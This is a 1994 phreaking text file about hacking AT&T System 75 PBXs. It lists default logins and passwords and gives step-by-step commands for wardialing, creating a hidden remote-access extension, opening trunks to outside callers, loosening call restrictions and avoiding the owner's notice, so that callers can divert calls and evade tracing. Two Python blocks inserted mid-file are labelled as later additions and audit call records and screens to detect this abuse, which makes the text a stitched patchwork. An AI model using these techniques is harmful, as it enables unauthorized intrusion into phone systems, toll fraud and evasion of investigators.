__
                      \ /          |_
                      / \ e n o n  |  o u n d a t i o n 
                                
                                  presents:
                                  
                                  \     /
                      *------  the  \ /  
                                    / \  files  ------*
                                  /     \
                
                            Spring/1994  Issue: 15
         
                     "Stealth in Diverting - PBX Style"
                      
                                By: Erik Turbo

Disclaimer: 
      
     The information provided below is solely for the purpose of diverting
     yourself  from possible  traces, ANI, and Caller ID.  It  is *not* to
     be used for long distance toll fraud, including abusing 900 services, 
     using illicit calling cards, or other forms of credit card fraud.


Introduction
~~~~~~~~~~~~
A PBX, or Private Branch eXchange, is an on-premise facility, owned or leased
by an organization, which interconnects the telephones within the facility
and provides access to the public telephone system. Basically, it is a
mini-switching station: it allows a telephone user on the premises to dial
a three or four digit number (extension) to call another telephone on the
premises, and to dial one digit (usually 8 or 9) to get a dial tone for an
"outside line," which lets the caller dial out to the rest of the public
telephone network. This is the most important feature for a hacker who
desires the stealth that is necessary to continue his explorations. In short,
you can remain well-hidden if you use a PBX's outside lines to connect to the
computer you are hacking. That way, any Caller ID, ANI, or trace will reach
the PBX number - not your home telephone. When you have mastered the art of
PBX hacking, you should make a habit of diverting with 3 or 4 "well spaced"
PBXs before hitting your target destination. For the advanced hacker,
diverting with PBXs is just the beginning of his actual diversion; it is
best to bury yourself in packet-switched networks, loop in and out of
Internet hosts, bounce yourself off of satellites with international calling,
and utilize all of the data-based outdials that you have. Remember, abusing
these PBXs for unnecessary long distance calling is NOT condoned by me, or
any members of the Xenon Foundation; it will kill the PBX quicker, and place
you at risk of serious fraud charges.

Definity G Model System 75
~~~~~~~~~~~~~~~~~~~~~~~~~~
Definity model System 75 systems control a large number of medium-sized
(approx. 1000 lines) PBXs. It is owned by AT&T, and was developed in
the late 1970's, with modifications in 1983 and 1986. The actual System
75 machine has one or more incoming 1200bps data lines, which connect
at 7E1. It is through this remote port that you may begin your actual
hacking of the PBX. Since all of the changes you make via modem affect
the entire telephone network on the PBX, this is a power that you will
have to learn how to abstain from abusing. It is possible to turn the
once smoothly operating phone system into a chaotic mass of busy signals,
re-routes, voice mail boxes, tones, and bridges, effectively shutting down
the victim for hours, if not days. For this reason, I will only inform
readers on how to create a remote extension for diverting purposes.

Connection
~~~~~~~~~~
The  best way  to find a System 75 is to scan ("wargame dial") your local
telephone exchanges.  There  are  still  dozens of  them around,  and you
are bound to hit at least one in a few days of scanning.  Upon connection
you will see the System 75 login and authorization prompts:

Login: xxx
Password: xxx
INCORRECT LOGIN

You will be given three chances to guess the authorization password before
the system will drop carrier. On telephone systems that provide
Caller ID services, I would be wary; it is quite possible the System 75
dialup as well as the PBX are equipped with ANI for auditing purposes.

Default Accounts and Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                  
With  every  new  System  75 package,  AT&T  includes a  large  number of 
accounts  and passwords  already installed and ready for usage.  Usually, 
these passwords are never changed by the owners. Here is a listing of the 
known System 75 default accounts and passwords that are included in every 
Definity G package:

Login: enquiry  Password: enquirypw
Login: init     Password: initpw
Login: browse   Password: looker
Login: maint    Password: rwmaint
Login: locate   Password: locatepw
Login: rcust    Password: rcustpw
Login: tech     Password: field
Login: cust     Password: custpw
Login: inads    Password: inads
Login: support  Password: supportpw
Login: bcim     Password: bcimpw
Login: bcnas    Password: bcnspw
Login: craft    Password: craftpw

Note: The browse account can *not* modify anything on the system 75.
      It is only useful for examining the possibility of an existing 
      remote extension, not for the actual creation of one.


Internal System 75 Commands
~~~~~~~~~~~~~~~~~~~~~~~~~~~
If those defaults did not work, the only other alternatives are social
engineering and brute force hacking. Neither is likely to work
unless you are a social engineering master, or have time to waste brute
force hacking. Your best bet is to move on and hope to scan a less
protected System 75.

Assuming  you have passed  the authorization, you will be prompted with
the following:

Terminal Type (513, 4410, 4425): [513] 

These  are the  basic  System 75  remote  usage emulation codes.  I prefer 
to use 4410,  as  it  appears  much  "cleaner"  on  a  VT100  IBM PC.  The 
emulation  is  used  to remotely send System 75 key sequences,  to request 
help, to save a session, to move forward a page, to move back a page, etc. 
Since  the  IBM keyboard  has no way  to emulate these keys, the System 75 
provides  3  basic  emulation  codes.  For  our  purposes,  use 4410.  The 
following sequences will work with emulation 4410:
                        
ESC Op - To cancel a command
ESC Ot - To request Help
ESC Ov - Next Page
ESC Ow - Previous Page
ESC Or - Save
ESC Oq - Refresh Screen
ESC Os - Clear Fields

You can achieve  the escape sequences by hitting the ESC key, and then the
key combination O and the following character.

Once you have chosen emulation 4410, please remember (or take note of) the
previous escape sequences. You will not be able to save information
without knowing the proper code ("ESC Or"). ESC Op is also very important
since it is the only method of stopping the execution of a command;
something you will have to do constantly when looking over certain pieces
of information within the System 75. Take these down!

Next you will see the AT&T banner and the command prompt:
                        
                        
                        Copyright (c) 1986 - AT&T


                   Unpublished & Not for Publication


                          All Rights Reserved 

enter command:

There is online help available at all times by pressing "ESC Ot", as well
as keying 'help' at the command prompt. Familiarize yourself with the
system. It is basically cryptic, as it is usually only used by
experienced AT&T technicians.

Examining the PBX 
~~~~~~~~~~~~~~~~~
Once you are in, you now want to get to working on your  diverter.  What
you will obviously need is an extension dedicated  explicitly for a dial
tone  to the  outside  network.  To accomplish  this quickly and easily,
all you must do is type  "change remote" at  the  command  prompt.  This
will bring you to the following screen:

change remote-access                                           Page  1 of  1
                                REMOTE ACCESS
               
               
               Remote Access Extension:
                   Barrier Code Length: 
BARRIER CODE ASSIGNMENTS (Enter up to 10)
        
        Barrier Code    COR                    Barrier Code    COR
     1:                 1                    6:                 1
     2:                 1                    7:                 1
     3:                 1                    8:                 1
     4:                 1                    9:                 1
     5:                 1                    10:                1

As you can see, there is no remote access extension set up; therefore this
PBX does not have any existing dialtones available. Now to create one,
type in the extension you wish to direct you to your dialtone. The
extension you type in should be a 4 digit number, starting with "2" or "4",
as these are valid extensions under System 75 software. When you type
in your extension, press enter; if it gives you an error, try a different
extension until it accepts your input.

If you wish to add a security code on your dialtone, you may enter its
length at the "Barrier Code Length:" prompt. Under the heading "Barrier
Code", at the "1:" prompt, type in your desired security code. After you
are all set, the screen should look something like this:

change remote-access                                           Page  1 of  1
                                REMOTE ACCESS
               
               
               Remote Access Extension: 2400
                   Barrier Code Length: 6
BARRIER CODE ASSIGNMENTS (Enter up to 10)
        
        Barrier Code    COR                    Barrier Code    COR
     1: 222222          1                    6:                 1
     2:                 1                    7:                 1
     3:                 1                    8:                 1
     4:                 1                    9:                 1
     5:                 1                    10:                1

Now you have a working extension that is not only available for your
use in diverting,  but also secure  from others who do not know your
barrier code.  Type the key combination "ESC Or" to save your work.

Finding the PBX Dialup
~~~~~~~~~~~~~~~~~~~~~~
Now that you are guaranteed a tone, you must find out the telephone number
the PBX is located at. Type "list trunk-group" at the command prompt.
It should give you a listing similar to this:


Group                                       No. of                  Outgoing
Number  TAC  Group Type    Group Name       Members   COR   SMDR?   Display?

1       801   co           Incoming          12        1     y        n
2       851   co           Sales Room         1        1     y        n
9       809   co           Billing            4        1     y        n
10      810   co           Admin line         1        63    y        n

Command successfully completed

Now that you have a listing of all the trunk groups that are present on the
PBX, you can individually list them to get their corresponding telephone
numbers. Type "display trunk-group 1" to display trunk group 1
(Group Number 1, Group Name "Incoming"). As you can see from the above
capture, there are 4 trunk groups available: 1, 2, 9, and 10. Display each of
them, and use the 'next page' ("ESC Ov") key combination to get to the
page (usually page 2 or 3) with the telephone numbers of the trunk. Each
time you display the trunks, you will get a screen similar to the
following:

display trunk-group 1                                           Page  1 of  5
                                TRUNK GROUP

Group Number: 1                    Group Type: co            SMDR Reports? y
  Group Name: Incoming                    COR: 1                      TAC: 801
   Direction: two-way        Outgoing Display? n         Data Restriction? n
 Dial Access? y                Busy Threshold: 60           Night Service:
Queue Length: 0                                      Incoming Destination: 200
   Comm Type: voice                                 Digit Absorption List:
    Prefix-1? n                   Restriction: toll    Allowed Calls List? n

TRUNK PARAMETERS
            Trunk Type: loop-start
    Outgoing Dial Type: tone
     Trunk Termination: rc                    Disconnect Timing(msec): 500
        ACA Assignment? n
                                                    Maintenance Tests? y
 Answer Supervision Timeout:                    Suppress # Outpulsing? n
_____________________________________________________________________________

To get the actual dialups, you must look on the following pages. The
"ESC Ov" combination will do that under emulation 4410:

_____________________________________________________________________________
display trunk-group 1                                           Page  2 of  5
                                 
                                 TRUNK GROUP 

GROUP MEMBER ASSIGNMENTS
                 
                 Port      Name         Mode         Type    Answer Delay
              1: A0101    555-2322
              2: A0102    555-2342
              3: A0103    555-2343
              4: A0104    555-2345
              5: A0105    555-2456
              6: A0106    555-2457
              7: A0107    555-2458
              8: A0108    555-2459
              9: A0201    555-2460
             10: A0202    555-2461
             11: A0203    555-2462
             12: A0204    555-2470
             13: A0205    555-2800
             14: A0206    555-2810
             15: A0207    555-2811

Make a note  of the telephone numbers on the trunks, and dial  them up after 
logging  off  the  System  75.  When  you  dial  them  up  voice,  if one of 
them prompts you for an extension, type in the remote extension  you created 
earlier.  You should hear the tone to an outside line.  If  you created  the 
remote extension with a barrier code, touch-tone that in now. Next, dial "9" 
to  get an outside line (It can also be "8" on some systems),  and then dial 
the  telephone number  you want to reach, just as normally as you would from
your home telephone.
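Everything in the sequence just described (a call arrives on a trunk, the
remote access extension answers, a barrier code is keyed in, then "9" and an
outside number are dialed) appears on the owner's side as a single call that
came in on one trunk group and went back out on another, and the trunk groups
shown above have "SMDR Reports? y", so each such call leaves a record. The
Python below is an added example written for the PBX owner; it is not part of
this file and not AT&T software. It scans call records in a constructed
comma-separated layout (real SMDR output differs by switch and release, so the
field mapping, the office hours and the "011" international prefix are all
assumptions) and flags trunk-to-trunk calls, marks the after-hours and
international ones, and ranks the incoming trunk groups so the owner knows
where to switch remote access off first.

```python
"""Flag remote-access dial-through in PBX call records.

Added example (not part of the original file, nor AT&T software).  The
comma-separated layout below is CONSTRUCTED for this example; map your own
SMDR fields onto CallRecord.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, time

# Constructed sample records:
#   date, time, incoming trunk group, outgoing trunk group, dialed digits, seconds
# An empty trunk group means the call did not touch that side of the switch.
SAMPLE_SMDR = """\
1994-03-02,09:12:44,1,,2101,185
1994-03-02,14:03:10,,9,5551234,62
1994-03-02,23:41:07,1,9,011441710000000,905
1994-03-03,02:15:30,1,9,5559876,340
1994-03-03,02:40:12,1,9,5559877,120
1994-03-03,11:20:00,2,9,5551000,45
"""

BUSINESS_START = time(7, 0)   # assumed office hours for the after-hours rule
BUSINESS_END = time(19, 0)


@dataclass(frozen=True)
class CallRecord:
    when: datetime
    in_trunk: str    # trunk group the call arrived on ('' if it started inside)
    out_trunk: str   # trunk group the call left on ('' if it ended inside)
    dialed: str
    seconds: int


def parse_smdr(text):
    """Parse the constructed comma-separated records into CallRecord objects."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        date, clock, in_trk, out_trk, dialed, secs = line.split(",")
        when = datetime.fromisoformat(f"{date}T{clock}")
        records.append(CallRecord(when, in_trk, out_trk, dialed, int(secs)))
    return records


def classify(rec):
    """Return the reasons a record looks like dial-through abuse ([] if clean).

    A call that both arrived on a trunk and left on a trunk passed through
    the switch without any station on the premises: that is exactly what a
    remote access extension produces, with or without a barrier code.
    """
    reasons = []
    if rec.in_trunk and rec.out_trunk:
        reasons.append("trunk-to-trunk")
        if not BUSINESS_START <= rec.when.time() < BUSINESS_END:
            reasons.append("after-hours")
        if rec.dialed.startswith("011"):      # North American international prefix
            reasons.append("international")
    return reasons


def audit(text):
    """List (timestamp, in_trunk, out_trunk, reasons) for every suspicious record."""
    findings = []
    for rec in parse_smdr(text):
        reasons = classify(rec)
        if reasons:
            findings.append((rec.when.isoformat(), rec.in_trunk, rec.out_trunk, reasons))
    return findings


def top_incoming_trunks(findings):
    """Rank incoming trunk groups by suspicious calls: where to restrict first."""
    return Counter(in_trunk for _, in_trunk, _, _ in findings).most_common()


if __name__ == "__main__":
    hits = audit(SAMPLE_SMDR)
    for when, in_trk, out_trk, reasons in hits:
        print(f"{when}  in:{in_trk} out:{out_trk}  {', '.join(reasons)}")
    print("incoming trunk groups to review:", top_incoming_trunks(hits))
```

Running the file prints the four flagged records from the sample; the
office-hours band and the international prefix are the two values to adjust
for a given site, and a trunk group that keeps showing up at the top of the
ranking is the one whose Incoming Destination deserves a look.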

Tricks and Hints
~~~~~~~~~~~~~~~~
The following are methods and commands that can be used in addition to
the  above mentioned  hacking tactics.  They  are not necessary to the
smooth creation of a remote dialtone off of a PBX, however.

When  you are displaying the trunk-groups individually, look under the
heading  "Direction: "  (found on page 1).  If it says "one-way", then
modify that (with the "change trunk #" command) to say "two-way". Also 
on page 1, change the "Incoming Destination: "  header to reflect your
newly  created  remote  access extension  that you created earlier. On
the  next page,  get  the  dialups.  You have just created a large set
of  tones.  Since  they  used  to be  "one-way", only users within the 
building  could use  them to dialout, but since you have changed it to 
"two-way",  and  changed the  incoming  destination  extension to your
remote extension,  you are  allowing incoming  callers to use the tone 
service as well.

If you do  not want to arouse suspicion, instead of changing the "Incoming
Destination: " to your extension, just change the "Night Service: " header
to your remote  extension.  With this,  however, you can only use the tone
service after hours; usually after the business closes.


To get an idea of how the extensions are uniformly placed on the PBX,
type "display dialplan" at the command prompt. This will give you
all the prefixes to the three or four digit extensions. This is valuable
if you are having trouble finding a valid extension to use for your
remote extension.

When  displaying  a trunk  group, mark down the COR (Class of Restriction)
number.  Type  "display COR #"  (where #  is the  COR number of a specific
trunk). Make sure the FRL prompt is set to 7, and the calling restrictions 
are  set to  "none".  If not,  type  "change cor  (COR #)",  and  make the 
necessary modifications.  

Type "display feature" to get a listing of all the feature access codes on 
the system. This is valuable if you can not get an outside line by dialing 
"9", or "8".  The dialout access code will be in here.
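Taken together, the "Examining the PBX" section and the hints above name a
handful of settings that an administrator can read straight off the same
screens: a remote access extension with a blank or trivial barrier code, a
trunk group whose Incoming Destination or Night Service points at that
extension, and a COR with FRL 7 and no calling restriction. The Python below
is an added example, not part of this file and not AT&T software. It parses
pasted screen captures and reports those settings as findings. The sample
screens are the two from this article, with the trunk group's Incoming
Destination pointed at the remote extension as the hint above describes, plus
a constructed "display cor" screen whose layout is assumed; the parsing rules
(a label ends in ':' or '?', a barrier code is 4 to 7 digits after a slot
number) are assumptions as well.

```python
"""Audit pasted System 75 screens for the remote-access settings described above.

Added example; not part of the original file and not AT&T software.  Field
labels are the ones visible on the article's screens.  The parsing rules and
the 'display cor' layout in the sample are ASSUMPTIONS made for this example.
"""
import re

# The first two screens are the article's captures, except that Incoming
# Destination has been pointed at the remote access extension.  The COR
# screen is constructed; its layout is assumed.
REMOTE_ACCESS_SCREEN = """\
change remote-access                                           Page  1 of  1
                                REMOTE ACCESS
               Remote Access Extension: 2400
                   Barrier Code Length: 6
BARRIER CODE ASSIGNMENTS (Enter up to 10)
        Barrier Code    COR                    Barrier Code    COR
     1: 222222          1                    6:                 1
     2:                 1                    7:                 1
"""
TRUNK_GROUP_SCREEN = """\
display trunk-group 1                                           Page  1 of  5
                                TRUNK GROUP
Group Number: 1                    Group Type: co            SMDR Reports? y
  Group Name: Incoming                    COR: 1                      TAC: 801
   Direction: two-way        Outgoing Display? n         Data Restriction? n
 Dial Access? y                Busy Threshold: 60           Night Service:
Queue Length: 0                                      Incoming Destination: 2400
"""
COR_SCREEN = """\
display cor 1                                                   Page  1 of  1
                             CLASS OF RESTRICTION
COR Number: 1
       FRL: 7
Calling Party Restriction: none
"""

FIELD = re.compile(r"([A-Za-z][A-Za-z0-9 #/()\-]*?)[?:]\s*(\S*)")   # 'Label: value' / 'Label? value'
BARRIER = re.compile(r"\b\d{1,2}:\s+(\d{4,7})\b")                   # 'slot: code'


def parse_screen(text):
    """Map every label on a screen to its (first-word) value; blanks stay ''."""
    fields = {}
    for line in text.splitlines():
        for label, value in FIELD.findall(line):
            fields[label.strip()] = value
    return fields


def parse_barrier_codes(text):
    """Collect the barrier codes filled into the numbered slots."""
    return [m.group(1) for line in text.splitlines() for m in BARRIER.finditer(line)]


def weak_barrier_code(code):
    """Repeated digits (222222) or a straight run (123456) are guessable."""
    if len(set(code)) == 1:
        return True
    steps = {int(b) - int(a) for a, b in zip(code, code[1:])}
    return steps == {1} or steps == {-1}


def audit_remote_access(screen):
    fields = parse_screen(screen)
    ext = fields.get("Remote Access Extension", "")
    if not ext:
        return []                      # remote access is off: nothing to report
    findings = []
    codes = parse_barrier_codes(screen)
    if fields.get("Barrier Code Length", "") in ("", "0") or not codes:
        findings.append(("HIGH", f"remote access ext {ext} gives dial tone with no barrier code"))
    for code in codes:
        if weak_barrier_code(code):
            findings.append(("MEDIUM", f"barrier code {code} is trivially guessable"))
    return findings


def audit_trunk_group(screen, remote_ext):
    fields = parse_screen(screen)
    name = f"trunk group {fields.get('Group Number', '?')}"
    findings = []
    if remote_ext and fields.get("Incoming Destination") == remote_ext:
        findings.append(("HIGH", f"{name} answers incoming calls on remote access ext {remote_ext}"))
    if remote_ext and fields.get("Night Service") == remote_ext:
        findings.append(("HIGH", f"{name} night service goes to remote access ext {remote_ext}"))
    if fields.get("Direction") == "two-way" and fields.get("Dial Access") == "y":
        findings.append(("INFO", f"{name} is two-way with dial access; check its COR"))
    return findings


def audit_cor(screen):
    fields = parse_screen(screen)
    cor = fields.get("COR Number", "?")
    findings = []
    if fields.get("FRL") == "7":
        findings.append(("MEDIUM", f"COR {cor} has FRL 7, the least restrictive level"))
    if fields.get("Calling Party Restriction") == "none":
        findings.append(("MEDIUM", f"COR {cor} has no calling party restriction"))
    return findings


def audit_all(remote_screen, trunk_screens, cor_screens):
    """Run every check; the remote access extension ties the screens together."""
    ext = parse_screen(remote_screen).get("Remote Access Extension", "")
    findings = audit_remote_access(remote_screen)
    for screen in trunk_screens:
        findings += audit_trunk_group(screen, ext)
    for screen in cor_screens:
        findings += audit_cor(screen)
    return findings
```

Calling audit_all(REMOTE_ACCESS_SCREEN, [TRUNK_GROUP_SCREEN], [COR_SCREEN])
on the samples returns five findings: the guessable barrier code, the trunk
group answering on the remote extension, the two-way trunk with dial access,
and the COR's FRL 7 and missing calling restriction. The value parser only
keeps the first word after a label, so a multi-word Group Name is truncated;
none of the checks depend on that field.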


Conclusion
~~~~~~~~~~~                                                              
Basically, it is extremely simple to create a remote extension off of a
PBX in your local area. If you use the PBX just to make local calls and
to divert yourself further through the telephone network, it should last
a rather long time. However, if you abuse it by dialing Alliance
Teleconferences every night, or to call your friend in the UK three times
a day, it will either die, or get slapped with ANI.
                               
I have tried to be as straightforward as possible, without having to
technically explain every detail of operation. Once you get the hang of
it, you should be able to create your remote extensions in under 10
minutes. However, if you are having problems, you can contact me at the
following locations:

Internet Mail: erikt@xf.com
Void of Deception: [508]/998-2400

Additional Reading:
~~~~~~~~~~~~~~~~~~~
Hacking AT&T System 75, Scott Simpson, Phrack 41, File 6.
System 75 Hacking (An Online Tutorial), Panther Modern, COTNO01.TXT, File 3.
Data and Computer Communications, William Stallings, Macmillan Publishing Co.